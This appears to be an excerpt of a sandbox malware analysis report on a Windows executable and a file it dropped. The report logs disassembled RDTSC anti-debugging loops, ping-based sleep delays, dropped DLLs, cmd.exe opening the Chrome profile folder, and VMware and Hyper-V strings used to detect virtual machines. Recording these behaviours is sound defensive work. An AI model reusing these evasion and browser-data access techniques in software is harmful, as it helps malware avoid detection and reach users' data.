Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC825387h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100204C0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 4652Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6000Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6548Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
Source: 56BB1610C0318054.exe, 00000002.00000003.388069693.0000000003D66000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Source: 56BB1610C0318054.exe, 00000002.00000003.369180667.0000000002261000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000003.387589885.0000000003D78000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: ecvFEAD.tmp.9.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20200930T152706Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9464ba7a943c4f4990f3a39a7d804c7f&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663574&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663574&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 56BB1610C0318054.exe, 00000002.00000003.387787563.0000000003D61000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}`
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Cyfj6XGbkd.exe, 00000000.00000002.365647493.000000000088D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000003.371196297.00000000005A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000004.00000003.368996807.0000000002A04000.00000004.00000040.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}#V
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWocal Area Connection* 8-QoS Packet Scheduler-0000
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000004.00000003.368954748.00000000028A1000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}GU
Source: 56BB1610C0318054.exe, 00000002.00000003.369180667.0000000002261000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000002.413280132.0000000002389000.00000004.00000001.sdmpBinary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
